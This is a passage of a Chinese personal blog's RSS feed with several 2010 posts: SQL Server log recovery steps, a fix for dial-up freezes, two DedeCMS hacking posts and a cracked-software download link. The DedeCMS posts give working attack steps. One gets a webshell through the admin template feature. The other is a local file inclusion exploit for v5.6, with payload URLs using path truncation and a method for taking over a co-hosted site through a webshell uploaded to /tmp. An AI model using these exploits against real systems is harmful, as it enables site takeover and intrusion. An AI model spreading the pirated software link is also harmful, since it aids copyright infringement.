<p>    那么就只好试一下这些方案了。当然，是要求至少你的数据文件是存在的，要是数据文件、日志文件和备份都没有了的话，别找我，你可以到楼顶上去唱“神啊，救救我吧”。</p>
<p>    首先，你可以试一下sp_attach_single_file_db，试着恢复一下你的数据文件，虽然能恢复的可能性不大，不过假如这个数据库刚好执行了一个checkpoint的话，还是有可能成功的。</p>
<p>    如果你没有好到有摸彩票的手气，最重要的数据库没有像你期盼的那样attach上去，不要气馁，还是有别的方案的。</p>
<p>    我们可以试着重新建立一个log，先把数据库设置为emergency mode，sysdatabases的status为32768 就表示数据库处于此状态。</p>
<p>    不过系统表是不能随便改的，设置一下先</p>
<p>    Use Master</p>
<p>    Go</p>
<p>    sp_configure &#8216;allow updates&#8217;, 1</p>
<p>    reconfigure with override</p>
<p>    Go</p>
<p>    然后 update sysdatabases set status = 32768 where name = &#8221;</p>
<p>    现在，祈求满天神佛的保佑吧，重新建立一个log文件。成功的机会还是相当大的，系统一般都会认可你新建立的日志。如果没有报告什么错误，现在就可以松一口气了。</p>
<p>    虽然数据是恢复了，可是别以为事情就算完成了，正在进行的事务肯定是丢失了，原来的数据也可能受到一些损坏。</p>
<p>    先把SQL Server 重新启动一下，然后检查你的数据库吧。</p>
<p>    先设置成单用户模式，然后做</p>
<p>    dbcc sp_dboption &#8221;, &#8217;single user&#8217;, &#8216;true&#8217;</p>
<p>    DBCC CHECKDB(&#8221;)</p>
<p>    如果没有什么大问题就可以把数据库状态改回去了，记得别忘了把系统表的修改选项关掉。update sysdatabases set status = 28 where name = &#8221; ，当然你的数据库状态可能不是这个，自己改为合适的值吧。也可以用</p>
<p>    sp_resetstatus</p>
<p>    go</p>
<p>    sp_configure &#8216;allow updates&#8217;, 0</p>
<p>    reconfigure with override</p>
<p>    Go</p>
<p>    checkdb的时候可能报告有一些错误，这些错误的数据你可能就只好丢弃了。</p>
<p>    checkdb有几种修复选项，自己看着用吧，不过最后你可能还是得REPAIR_ALLOW_DATA_LOSS，完成所有修复。</p>
<p>    chekcdb并不能完成所有的修复，我们需要更进一步的修复，用DBCC CHECKTABLE对每一个表做检查吧。</p>
<p>    表的列表可以用sysobjects里面得到，把OBJECTPROPERTY是IsTable的全部找出来检查一下吧，这样能够基本上解决问题了，如果还报告错误，试着把数据select into到另一张表检查一下。</p>
<p>    这些都做完了之后，把所有索引、视图、存储过程、触发器等重新建立一下。DBCC DBREINDEX也许可以帮你一些忙。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/533.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>拨号上网计算机出现假死状态怎么办?</title>
		<link>http://www.tuifei.net/530.html</link>
		<comments>http://www.tuifei.net/530.html#comments</comments>
		<pubDate>Thu, 19 Aug 2010 13:33:50 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[it]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=530</guid>
		<description><![CDATA[处理计算机在拨号上网时假死状态有如下几种方法，其中第二种方法是最有效的解决方法，也是最简单的，一般人只要掌握了这种方法基本上就可以解决这种情况。如果知道路由设置, 这些ADSL... ]]></description>
			<content:encoded><![CDATA[<p>处理计算机在拨号上网时假死状态有如下几种方法，其中第二种方法是最有效的解决方法，也是最简单的，一般人只要掌握了这种方法基本上就可以解决这种情况。如果知道路由设置, 这些ADSL安装调试以及电脑维护人员来说就需要三种方法都要掌握了。</p>
<p>   一、开启ADSL宽带猫的DHCP功能</p>
<p>    一般的ADSL Modem都内置了DHCP功能，这项功能在默认状态下是禁用的，我们可以通过ADSL的设置程序开启DHCP，当Windows XP系统发出IP地址分配请求时，迅速提供可用的IP地址，Windows XP系统就不会出现假死现象。</p>
<p>    下面以东信E700A为例来说明如何开启ADSL的DHCP功能。E700A的IP地址默认为192.168.1.1。首先在网络属性中把网卡的 IP地址设为192.168.1.2。打开IE，在地址栏中输入http://192.168.1.1/，用户名和密码都为root，进入“局域网”中的 “DHCP模式”，在下拉菜单中选择“DHCP Server”，再点击下方的“提交”按钮，接着保存设置并重新启动即可对于我们<span id="more-530"></span></p>
<p>    二、给网卡指定固定IP地址</p>
<p>    在“控制面板”中打开“网络连接”窗口，找到与ADSL相连的“本地连接”进入该连接的“属性”窗口，双击“常规”项中的“Internet协议(TCP/IP)”，把网卡的IP地址设为192.168.0.1，子网掩码设为255.255.255.0，网关和DNS为默认设置，最后点击“确定”按钮即可。</p>
<p>   三、开启Windows XP的Internet连接共享</p>
<p>    虽然ADSL只连接了一台电脑，再设置Internet连接共享好像多此一举，但如果开启“Internet连接共享”，Windows XP系统就会变成一个微型的DHCP服务器，它会强行把网卡的IP地址设为192.168.0.1，这一方法和方法1有异曲同工之妙。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/530.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dedecms漏洞 后台拿Shell</title>
		<link>http://www.tuifei.net/519.html</link>
		<comments>http://www.tuifei.net/519.html#comments</comments>
		<pubDate>Sun, 25 Jul 2010 05:22:32 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[网络编程]]></category>
		<category><![CDATA[dedecms]]></category>
		<category><![CDATA[dedecms 漏洞]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=519</guid>
		<description><![CDATA[DEDE后台能直接上传PHP文件，他是传到uploads目录了，当遇到下面的情况时

那就利用模板上传的功能得Shell，在模板那里新建一个HTM文件，或者上传一个

然后保存，到生成首页文件那里，把上面... ]]></description>
			<content:encoded><![CDATA[<p>DEDE后台能直接上传PHP文件，他是传到uploads目录了，当遇到下面的情况时<br />
<img class="alignnone size-full wp-image-520" title="1" src="http://www.tuifei.net/wp-content/uploads/2010/07/1.jpg" alt="1" width="341" height="318" /><span id="more-519"></span></p>
<p>那就利用模板上传的功能得Shell，在模板那里新建一个HTM文件，或者上传一个<br />
<img class="alignnone size-full wp-image-521" title="2" src="http://www.tuifei.net/wp-content/uploads/2010/07/2.jpg" alt="2" width="190" height="313" /></p>
<p>然后保存，到生成首页文件那里，把上面改成你修改上传的HTM文件，下面改后缀为PHP之后就生成</p>
<p><img class="alignnone size-full wp-image-522" title="3" src="http://www.tuifei.net/wp-content/uploads/2010/07/3.jpg" alt="3" width="411" height="220" /></p>
<p><img class="alignnone size-full wp-image-523" title="4" src="http://www.tuifei.net/wp-content/uploads/2010/07/4.jpg" alt="4" width="375" height="303" /></p>
<p>发布一个文章，上传一个正常图片，修改文章，把实现构造好的图片传上去，构造表单把图片带入模版,预览,主要的是带入模版这一步，我已经能把那个不能显示的图片传上去了,在fck里面传的,但是这个是直接GETshell,5.3&#8212;5.6通杀</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/519.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Dedecms v5.6本地包含漏洞</title>
		<link>http://www.tuifei.net/517.html</link>
		<comments>http://www.tuifei.net/517.html#comments</comments>
		<pubDate>Sun, 25 Jul 2010 05:19:18 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[网络编程]]></category>
		<category><![CDATA[dedecms]]></category>
		<category><![CDATA[dedecms 漏洞]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=517</guid>
		<description><![CDATA[还是前段时间看dede代码的时候看到的，虽然很鸡肋，但也有点用，于是拖着没发；很无语的发现在t00ls被公布了，于是我稍微说一下之类本地包含漏洞的利用方法。
一、漏洞介绍
Dedecms V5.6 Final... ]]></description>
			<content:encoded><![CDATA[<p>还是前段时间看dede代码的时候看到的，虽然很鸡肋，但也有点用，于是拖着没发；很无语的发现在t00ls被公布了，于是我稍微说一下之类本地包含漏洞的利用方法。</p>
<p>一、漏洞介绍<br />
Dedecms V5.6 Final版本中的plus/carbuyaction.php文件中当dopost为return时，$code变量没有初始化，直接被带入了require once 语句中，由于后面限制了.php，从而只能导致本地包含漏洞。<span id="more-517"></span></p>
<p>二、漏洞细节<br />
1、 plus/carbuyaction.php文件：</p>
<p>//漏洞出现下$dopost 为return的时候，$code变量没有被赋值，由于dedecms的全局机制可以任意给其赋值，从而带入包含，导致本地包含漏洞。</p>
<p>…<br />
elseif($dopost == &#8216;return&#8217;){<br />
//$code直接引入，from www.oldjun.com<br />
require_once DEDEINC.&#8217;/payment/&#8217;.$code.&#8217;.php&#8217;;<br />
$pay = new $code;<br />
$msg=$pay-&gt;respond();<br />
ShowMsg($msg,&#8221;javascript:;&#8221;,0,3000);<br />
exit();<br />
}<br />
…<br />
2、 include/common.inc.php：</p>
<p>//无论是否打开magic_quotes_gpc，系统都对传进来的变量进行了addslashes处理，from www.oldjun.com<br />
…<br />
function _RunMagicQuotes(&amp;$svar)<br />
{<br />
if(!get_magic_quotes_gpc())<br />
{<br />
if( is_array($svar) )<br />
{<br />
foreach($svar as $_k =&gt; $_v) $svar[$_k] = _RunMagicQuotes($_v);<br />
}<br />
else<br />
{<br />
$svar = addslashes($svar);<br />
}<br />
}<br />
return $svar;<br />
}</p>
<p>//模拟register_globals，对_GET、_POST、_COOKIE全局化，from www.oldjun.com<br />
foreach(Array(&#8217;_GET &#8216;,&#8217;_POST&#8217;,'_COOKIE&#8217;) as $_request)<br />
{<br />
foreach($$_request as $_k =&gt; $_v) ${$_k} = _RunMagicQuotes($_v);<br />
}<br />
…<br />
三、漏洞利用<br />
1. windows系统：</p>
<p>IIS或者某些apache版本下php文件系统可以进行路径截断，<br />
可以通过<br />
///////////////////////////////////（若干/）<br />
/././././././././././././././././（若干/.）<br />
进行截断。</p>
<p>于是可以上传一个精心构造带有恶意php代码的图片，然后注册一个用户上传，比如上传到uploads/userup/2/12Ka5357-c53.jpg，于是可以通过访问：</p>
<p>http://127.0.0.1/ plus/carbuyaction.php?dopost=return&amp;code=../../uploads/userup/2/12Ka5357-c53.jpg///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////（若干/）</p>
<p>则有可能执行12Ka5357-c53.jpg中的恶意php代码，从而达到入侵的目的。</p>
<p>2.linux系统：</p>
<p>1）apache某些版本php文件系统支持路径截断，于是同windows下，可以通过<br />
///////////////////////////////////（若干/）<br />
/././././././././././././././././（若干/.）<br />
进行截断。</p>
<p>利用方法同windows:</p>
<p>于是可以上传一个精心构造带有恶意php代码的图片，然后注册一个用户上传，比如上传到uploads/userup/2/12Ka5357-c53.jpg，于是可以通过访问：</p>
<p>http://127.0.0.1/ plus/carbuyaction.php?dopost=return&amp;code=../../uploads/userup/2/12Ka5357-c53.jpg///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////（若干/）</p>
<p>则有可能执行12Ka5357-c53.jpg中的恶意php代码，从而达到入侵的目的。</p>
<p>2）旁注攻击</p>
<p>比如目标站是www.aaa.com，漏洞文件是：<br />
http://www.aaa.com/ plus/carbuyaction.php</p>
<p>同服务器有个站点www.bbb.com可以轻松入侵，拿到webshell，但是由于权限控制，www.bbb.com站的webshell访问或者控制不了www.aaa.com，于是我们可以通过这个本地包含漏洞达到入侵www.aaa.com的目的。</p>
<p>1. 通过www.bbb.com上传一个webshell到/tmp文件夹下，比如文件名是shell.php；<br />
2. 访问http://www.aaa.com/plus/carbuyaction.php?code=../../../../../../../tmp/shell则可以成功包含我们上传到临时文件夹下的webshell，由于当前是www.aaa.com的权限，则可以完全控制目标站点：www.aaa.com。</p>
<p><a href="http://"> </a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/517.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>爱聚合6.3.1破解版—最新版下载</title>
		<link>http://www.tuifei.net/511.html</link>
		<comments>http://www.tuifei.net/511.html#comments</comments>
		<pubDate>Sat, 24 Jul 2010 20:01:48 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[免费资源]]></category>
		<category><![CDATA[下载]]></category>
		<category><![CDATA[爱聚合]]></category>
		<category><![CDATA[爱聚合6.3.1破解版]]></category>
		<category><![CDATA[破解版]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=511</guid>
		<description><![CDATA[爱聚合6.3.1破解版—最新版下载
爱聚合系统全名是“爱聚合专题互动系统”，是一套首创的网赚程序，兼有CMS、BBS和SNS系统特性，其最大特点是可自动聚内容、自动伪原创、自动建专题、自动... ]]></description>
			<content:encoded><![CDATA[<p>爱聚合6.3.1破解版—最新版下载<br />
爱聚合系统全名是“爱聚合专题互动系统”，是一套首创的网赚程序，兼有CMS、BBS和SNS系统特性，其最大特点是可自动聚内容、自动伪原创、自动建专题、自动聚流量！爱聚合采用php+mysql开发，可运行于各种平台。<span id="more-511"></span></p>
<p>附件下载: <a title="爱聚合6.3.1破解版" href="http://www.tuifei.net/wp-content/uploads/2010/07/爱聚合6.3.1破解版.zip">爱聚合6.3.1破解版</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/511.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
